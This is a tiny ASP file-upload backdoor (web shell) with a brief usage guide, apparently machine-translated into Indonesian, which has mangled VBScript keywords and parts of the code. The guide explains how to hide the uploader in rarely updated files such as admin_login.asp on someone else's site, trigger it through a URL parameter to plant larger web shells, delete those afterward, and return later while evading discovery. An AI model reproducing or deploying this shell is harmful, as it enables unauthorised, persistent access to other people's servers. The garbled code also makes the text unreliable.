<%jika request.queryString ("action") = "log" lalu
a = request.totalbytes: jika a maka b = "adodb.stream": set c = createObject (b): c.type = 1: c.open: c.write request.binaryRead (a): c.position = 0: d = c.read: e = chrb (13) & chrb (10): f = instrb (d, e): e = chrb (13) & chrb (10): f = instrb (d, e): g = ch = for (13) & chrb (10): f = instrb (d, e) h = createObject (b): h.type = 1: h.open: c.position = f+1: c.copyto h, gf-3: h.position = 0: h.type = 2: h.charset = "big5": i = h.readtext: h.close: j = mid (i, instrrev (i, "/")+1, g): k = instrb (d, e & e) +4: l = instrb (k+1, d, kiri (d, f-1))-k-2: h.type = 1: h.open: c.position = k-1: c.copyto h, l: h.savetofile server.mappath (j), 2%> <bentuk enctype = multipart/metode-data metode = post> <input type = file nama = n> <input type = submit> </form>
<%berakhir jika%>
Alasan: Dapat mengunggah file, ukurannya sederhana, kecil, dan tidak mudah ditemukan.
Gunakan: Pertama gunakan layar haiyang atau biru untuk mengedit kuda ke beberapa file yang tidak mudah diperbarui, seperti admin_login.asp. Saat mengoperasikan file orang lain, cukup masukkan admin_login.asp? Action = Log di browser untuk mengunggah layar haiyang atau biru. Setelah operasi, gunakan layar biru dan fungsi penghapusan diri lainnya untuk menghapus layar biru. Saya akan menggunakan stasiun ini untuk mengunggahnya ke Haiyang dan sebagainya saat saya kembali. Hampir tidak diselidiki dan dibunuh.